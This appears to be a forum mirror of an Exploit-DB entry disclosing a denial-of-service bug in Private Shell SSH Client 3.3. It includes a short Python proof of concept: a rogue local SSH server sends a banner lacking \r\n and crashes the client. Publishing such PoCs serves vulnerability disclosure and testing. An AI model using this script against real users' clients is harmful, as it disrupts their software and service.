- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37149
- Проверка EDB
-
- Пройдено
- Автор
- 3UNNYM00N
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2015-05-29
Private Shell SSH Client 3.3 - Crash (PoC)
Код:
'''
# Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
# Date: 27-5-2015
# Vendor homepage: www.privateshell.com
# Software Link: http://www.privateshell.com/files/pshell.exe
# Version: 3.3
# Author: 3unnym00n
# Details:
# --------
# when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash
# Tested On: win7
# operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" [email protected]
'''
import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash- Источник
- www.exploit-db.com
